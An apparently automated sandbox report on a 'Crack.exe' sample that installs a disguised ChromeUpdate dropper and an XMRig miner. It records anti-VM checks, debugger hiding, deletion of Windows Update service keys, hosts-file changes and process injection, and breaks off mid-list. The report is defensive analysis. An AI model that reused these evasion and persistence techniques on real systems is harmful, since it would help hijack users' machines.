Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17-03-2023 10:57
Static task
static1
URLScan task
urlscan1
General
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
Processes:
Crack.exeUpdate.execonhost.exeCrack.exedescription pid process target process PID 3616 created 664 3616 Crack.exe Explorer.EXE PID 3616 created 664 3616 Crack.exe Explorer.EXE PID 3616 created 664 3616 Crack.exe Explorer.EXE PID 3616 created 664 3616 Crack.exe Explorer.EXE PID 3616 created 664 3616 Crack.exe Explorer.EXE PID 3604 created 664 3604 Update.exe Explorer.EXE PID 3604 created 664 3604 Update.exe Explorer.EXE PID 3604 created 664 3604 Update.exe Explorer.EXE PID 3604 created 664 3604 Update.exe Explorer.EXE PID 3604 created 664 3604 Update.exe Explorer.EXE PID 4944 created 664 4944 conhost.exe Explorer.EXE PID 3604 created 664 3604 Update.exe Explorer.EXE PID 2192 created 664 2192 Crack.exe Explorer.EXE PID 2192 created 664 2192 Crack.exe Explorer.EXE PID 2192 created 664 2192 Crack.exe Explorer.EXE PID 2192 created 664 2192 Crack.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
Crack.exeUpdate.exeCrack.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Crack.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Update.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Crack.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp xmrig behavioral1/memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp xmrig behavioral1/memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp xmrig behavioral1/memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp xmrig behavioral1/memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp xmrig behavioral1/memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp xmrig -
Drops file in Drivers directory 3 IoCs
Processes:
Crack.exeUpdate.exeCrack.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts Crack.exe File created C:\Windows\System32\drivers\etc\hosts Update.exe File created C:\Windows\System32\drivers\etc\hosts Crack.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Crack.exeCrack.exeUpdate.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Crack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Crack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Crack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Crack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Update.exe -
Executes dropped EXE 1 IoCs
Processes:
Update.exepid process 3604 Update.exe -
Processes:
resource yara_rule behavioral1/memory/3616-151-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp themida behavioral1/memory/3616-152-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp themida behavioral1/memory/3616-153-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp themida behavioral1/memory/3616-154-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp themida behavioral1/memory/3616-155-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp themida behavioral1/memory/3616-187-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp themida behavioral1/memory/3616-193-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp themida C:\Program Files\ChromeUpdate\Update.exe themida behavioral1/memory/3604-209-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp themida behavioral1/memory/3604-210-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp themida behavioral1/memory/3604-211-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp themida behavioral1/memory/3604-212-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp themida behavioral1/memory/3604-223-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp themida behavioral1/memory/3604-248-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp themida C:\Program Files\ChromeUpdate\Update.exe themida behavioral1/memory/3604-292-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp themida behavioral1/memory/2192-299-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp themida behavioral1/memory/2192-300-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp themida behavioral1/memory/2192-301-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp themida behavioral1/memory/2192-302-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp themida behavioral1/memory/2192-306-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp themida -
Processes:
resource yara_rule behavioral1/memory/2408-290-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp upx behavioral1/memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp upx behavioral1/memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp upx behavioral1/memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp upx behavioral1/memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp upx behavioral1/memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp upx behavioral1/memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp upx -
Processes:
Update.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Update.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Crack.exeUpdate.exeCrack.exepid process 3616 Crack.exe 3604 Update.exe 2192 Crack.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Update.exedescription pid process target process PID 3604 set thread context of 4944 3604 Update.exe conhost.exe PID 3604 set thread context of 2408 3604 Update.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.exeCrack.exeUpdate.execmd.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\ChromeUpdate\Update.exe Crack.exe File created C:\Program Files\Google\Libs\WR64.sys Update.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3292 sc.exe 1768 sc.exe 4916 sc.exe 4284 sc.exe 1424 sc.exe 180 sc.exe 2740 sc.exe 3484 sc.exe 5080 sc.exe 1512 sc.exe 4492 sc.exe 5036 sc.exe 3756 sc.exe 3484 sc.exe 2300 sc.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = d3273793ae45d901 iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{18F39858-8E46-4D57-97A8-2B28041FA364}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31021255" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3292743203" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31021255" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{EF5E2C87-C4BA-11ED-9F77-62080863D4B5} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "385819243" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3292743203" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings iexplore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Crack.exepowershell.exepowershell.exepowershell.exeUpdate.exepowershell.exepowershell.execonhost.execonhost.exepid process 3616 Crack.exe 3616 Crack.exe 708 powershell.exe 708 powershell.exe 3616 Crack.exe 3616 Crack.exe 3616 Crack.exe 3616 Crack.exe 3616 Crack.exe 3616 Crack.exe 5068 powershell.exe 5068 powershell.exe 5068 powershell.exe 3616 Crack.exe 3616 Crack.exe 5064 powershell.exe 5064 powershell.exe 3604 Update.exe 3604 Update.exe 3420 powershell.exe 3420 powershell.exe 3604 Update.exe 3604 Update.exe 3604 Update.exe 3604 Update.exe 3604 Update.exe 3604 Update.exe 3292 powershell.exe 3292 powershell.exe 3604 Update.exe 3604 Update.exe 3604 Update.exe 3604 Update.exe 4944 conhost.exe 4944 conhost.exe 3604 Update.exe 3604 Update.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe 2408 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 708 powershell.exe Token: SeShutdownPrivilege 3644 powercfg.exe Token: SeCreatePagefilePrivilege 3644 powercfg.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeShutdownPrivilege 4880 powercfg.exe Token: SeCreatePagefilePrivilege 4880 powercfg.exe Token: SeShutdownPrivilege 3532 powercfg.exe Token: SeCreatePagefilePrivilege 3532 powercfg.exe Token: SeShutdownPrivilege 1920 powercfg.exe Token: SeCreatePagefilePrivilege 1920 powercfg.exe Token: SeIncreaseQuotaPrivilege 5068 powershell.exe Token: SeSecurityPrivilege 5068 powershell.exe Token: SeTakeOwnershipPrivilege 5068 powershell.exe Token: SeLoadDriverPrivilege 5068 powershell.exe Token: SeSystemProfilePrivilege 5068 powershell.exe Token: SeSystemtimePrivilege 5068 powershell.exe Token: SeProfSingleProcessPrivilege 5068 powershell.exe Token: SeIncBasePriorityPrivilege 5068 powershell.exe Token: SeCreatePagefilePrivilege 5068 powershell.exe Token: SeBackupPrivilege 5068 powershell.exe Token: SeRestorePrivilege 5068 powershell.exe Token: SeShutdownPrivilege 5068 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeSystemEnvironmentPrivilege 5068 powershell.exe Token: SeRemoteShutdownPrivilege 5068 powershell.exe Token: SeUndockPrivilege 5068 powershell.exe Token: SeManageVolumePrivilege 5068 powershell.exe Token: 33 5068 powershell.exe Token: 34 5068 powershell.exe Token: 35 5068 powershell.exe Token: 36 5068 powershell.exe Token: SeIncreaseQuotaPrivilege 5068 powershell.exe Token: SeSecurityPrivilege 5068 powershell.exe Token: SeTakeOwnershipPrivilege 5068 powershell.exe Token: SeLoadDriverPrivilege 5068 powershell.exe Token: SeSystemProfilePrivilege 5068 powershell.exe Token: SeSystemtimePrivilege 5068 powershell.exe Token: SeProfSingleProcessPrivilege 5068 powershell.exe Token: SeIncBasePriorityPrivilege 5068 powershell.exe Token: SeCreatePagefilePrivilege 5068 powershell.exe Token: SeBackupPrivilege 5068 powershell.exe Token: SeRestorePrivilege 5068 powershell.exe Token: SeShutdownPrivilege 5068 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeSystemEnvironmentPrivilege 5068 powershell.exe Token: SeRemoteShutdownPrivilege 5068 powershell.exe Token: SeUndockPrivilege 5068 powershell.exe Token: SeManageVolumePrivilege 5068 powershell.exe Token: 33 5068 powershell.exe Token: 34 5068 powershell.exe Token: 35 5068 powershell.exe Token: 36 5068 powershell.exe Token: SeIncreaseQuotaPrivilege 5068 powershell.exe Token: SeSecurityPrivilege 5068 powershell.exe Token: SeTakeOwnershipPrivilege 5068 powershell.exe Token: SeLoadDriverPrivilege 5068 powershell.exe Token: SeSystemProfilePrivilege 5068 powershell.exe Token: SeSystemtimePrivilege 5068 powershell.exe Token: SeProfSingleProcessPrivilege 5068 powershell.exe Token: SeIncBasePriorityPrivilege 5068 powershell.exe Token: SeCreatePagefilePrivilege 5068 powershell.exe Token: SeBackupPrivilege 5068 powershell.exe Token: SeRestorePrivilege 5068 powershell.exe Token: SeShutdownPrivilege 5068 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
iexplore.exepid process 940 iexplore.exe 940 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 940 iexplore.exe 940 iexplore.exe 2448 IEXPLORE.EXE 2448 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
iexplore.execmd.execmd.exepowershell.execmd.execmd.exeUpdate.execmd.exedescription pid process target process PID 940 wrote to memory of 2448 940 iexplore.exe IEXPLORE.EXE PID 940 wrote to memory of 2448 940 iexplore.exe IEXPLORE.EXE PID 940 wrote to memory of 2448 940 iexplore.exe IEXPLORE.EXE PID 392 wrote to memory of 180 392 cmd.exe sc.exe PID 392 wrote to memory of 180 392 cmd.exe sc.exe PID 736 wrote to memory of 3644 736 cmd.exe powercfg.exe PID 736 wrote to memory of 3644 736 cmd.exe powercfg.exe PID 736 wrote to memory of 4880 736 cmd.exe powercfg.exe PID 736 wrote to memory of 4880 736 cmd.exe powercfg.exe PID 392 wrote to memory of 2740 392 cmd.exe sc.exe PID 392 wrote to memory of 2740 392 cmd.exe sc.exe PID 736 wrote to memory of 3532 736 cmd.exe powercfg.exe PID 736 wrote to memory of 3532 736 cmd.exe powercfg.exe PID 392 wrote to memory of 3484 392 cmd.exe sc.exe PID 392 wrote to memory of 3484 392 cmd.exe sc.exe PID 392 wrote to memory of 1512 392 cmd.exe sc.exe PID 392 wrote to memory of 1512 392 cmd.exe sc.exe PID 392 wrote to memory of 3292 392 cmd.exe sc.exe PID 392 wrote to memory of 3292 392 cmd.exe sc.exe PID 736 wrote to memory of 1920 736 cmd.exe powercfg.exe PID 736 wrote to memory of 1920 736 cmd.exe powercfg.exe PID 392 wrote to memory of 2688 392 cmd.exe reg.exe PID 392 wrote to memory of 2688 392 cmd.exe reg.exe PID 392 wrote to memory of 2044 392 cmd.exe reg.exe PID 392 wrote to memory of 2044 392 cmd.exe reg.exe PID 392 wrote to memory of 3620 392 cmd.exe reg.exe PID 392 wrote to memory of 3620 392 cmd.exe reg.exe PID 392 wrote to memory of 4960 392 cmd.exe reg.exe PID 392 wrote to memory of 4960 392 cmd.exe reg.exe PID 392 wrote to memory of 4064 392 cmd.exe reg.exe PID 392 wrote to memory of 4064 392 cmd.exe reg.exe PID 5064 wrote to memory of 3964 5064 powershell.exe schtasks.exe PID 5064 wrote to memory of 3964 5064 powershell.exe schtasks.exe PID 3316 wrote to memory of 4492 3316 cmd.exe sc.exe PID 3316 wrote to memory of 4492 3316 cmd.exe sc.exe PID 3644 wrote to memory of 3844 3644 cmd.exe powercfg.exe PID 3644 wrote to memory of 3844 3644 cmd.exe powercfg.exe PID 3316 wrote to memory of 1768 3316 cmd.exe sc.exe PID 3316 wrote to memory of 1768 3316 cmd.exe sc.exe PID 3644 wrote to memory of 4108 3644 cmd.exe powercfg.exe PID 3644 wrote to memory of 4108 3644 cmd.exe powercfg.exe PID 3316 wrote to memory of 4916 3316 cmd.exe sc.exe PID 3316 wrote to memory of 4916 3316 cmd.exe sc.exe PID 3316 wrote to memory of 3484 3316 cmd.exe sc.exe PID 3316 wrote to memory of 3484 3316 cmd.exe sc.exe PID 3644 wrote to memory of 3532 3644 cmd.exe powercfg.exe PID 3644 wrote to memory of 3532 3644 cmd.exe powercfg.exe PID 3316 wrote to memory of 2300 3316 cmd.exe sc.exe PID 3316 wrote to memory of 2300 3316 cmd.exe sc.exe PID 3316 wrote to memory of 764 3316 cmd.exe reg.exe PID 3316 wrote to memory of 